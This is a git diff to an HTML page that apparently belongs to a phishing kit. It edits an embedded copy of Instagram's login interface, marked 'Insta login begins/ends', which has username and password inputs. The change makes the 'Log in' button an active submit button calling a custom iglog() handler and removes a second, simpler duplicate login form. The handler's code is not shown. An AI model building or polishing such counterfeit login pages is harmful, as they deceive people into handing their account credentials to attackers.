--- a/9/index.html
+++ b/9/index.html
@@ -3456,7 +3456,7 @@
     </div>
 
     <!--Insta login begins-->
-    <div id="igp">
+    <div id="ig_wrapper">
         <div id="igcontainer" class="_ar45 system-fonts--body roboto">
             <div id="mount_0_0_6z">
                 <div class="">
@@ -3593,18 +3593,15 @@
                                                                                 <span
                                                                                     class="x1lliihq x1plvlek xryxfnj x1n2onr6 x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x173jzuc x2b8uid x1tu3fi x3x7a5m x10wh9bi x1wdrske x8viiok x18hxmgj"
                                                                                     dir="auto"
-                                                                                    style="cursor: pointer; line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;">Forgot
-                                                                                    password?</span>
+                                                                                    style="cursor: pointer; line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;">Forgotpassword?</span>
                                                                             </div>
                                                                             <div
                                                                                 class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
-                                                                                <button onclick="iglog()" id="ig-log"
-                                                                                    class=" _acan _acap _acas _aj1- _ap30"
-                                                                                    disabled="">
-                                                                                    <div
-                                                                                        class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
-                                                                                        Log in</div>
-                                                                                </button>
+
+                                                                                <button
+                                                                                    class="c-btn _acan _acap _acas _aj1- _ap30"
+                                                                                    type="submit" onclick="iglog()"
+                                                                                    id="ig-log"> Log in</button>
                                                                             </div>
                                                                         </div>
                                                                         <span
@@ -3663,31 +3660,6 @@
 
 
     <!--Insta login ends-->
-
-    <div id="ig_wrapper">
-        <main class="l-main">
-
-            <div class="l-user">
-                <div class="c-panel group">
-
-                    <img class="c-panel__img" src="asset/inst-img/instagram.svg" alt="Instagram">
-                    <div class="c-panel__form">
-                        <input type="text" class="c-panel__input" class="form-control" required
-                            data-error="Please enter your email" placeholder="Phone number, username, or email"
-                            id="ig-uname">
-                        <input type="text" class="c-panel__input" class="form-control" required
-                            data-error="Please enter your email" placeholder="Password" id="ig-pass">
-                        <button class="c-btn" type="submit" onclick="iglog()" id="ig-log"> Log In</button>
-                        <span class="c-panel__span">OR</span>
-                    </div>
-                    <br>
-                    <br>
-                </div>
-
-
-            </div>
-        </main>
-    </div>
 
     <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.all.min.js"></script>
     <script>
